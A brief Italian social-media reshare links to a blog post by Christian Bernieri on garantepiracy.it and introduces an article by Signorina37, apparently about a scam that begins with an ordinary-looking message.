Il post completo di Christian Bernieri è sul suo blog: garantepiracy.it/blog/lo-scamm…
Un gustoso articolo di Signorina37 (AKA Claudia), da leggere nel tempo di una canzone, per l'occasione, consiglio questa. Attenzione agli unicorni, sono strani. CB Comincia tutto con un messaggio, uno come tanti.

reshared this